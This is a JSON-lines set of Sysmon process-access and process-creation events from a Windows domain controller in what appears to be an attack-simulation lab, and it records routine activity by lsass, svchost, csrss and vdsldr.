{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.938\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B2-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.938","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B2-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.945\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001075D80200}\r\nProcessId: 3328\r\nImage: C:\\Windows\\System32\\vdsldr.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Virtual Disk Service Loader\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: vdsldr.exe\r\nCommandLine: C:\\Windows\\System32\\vdsldr.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.945","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001075D80200}","Image":"C:\\Windows\\System32\\vdsldr.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Virtual Disk Service Loader","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"vdsldr.exe","CommandLine":"C:\\Windows\\System32\\vdsldr.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.945\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001075D80200}\r\nTargetProcessId: 3328\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.945","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001075D80200}","TargetProcessId":"3328","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.945\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001075D80200}\r\nTargetProcessId: 3328\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.945","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001075D80200}","TargetProcessId":"3328","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.957\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001075D80200}\r\nTargetProcessId: 3328\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.957","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001075D80200}","TargetProcessId":"3328","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1261,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.958\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.958","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001066B80200}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.958\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.958","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001066B80200}","TargetProcessId":"2748","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.965\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.965","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 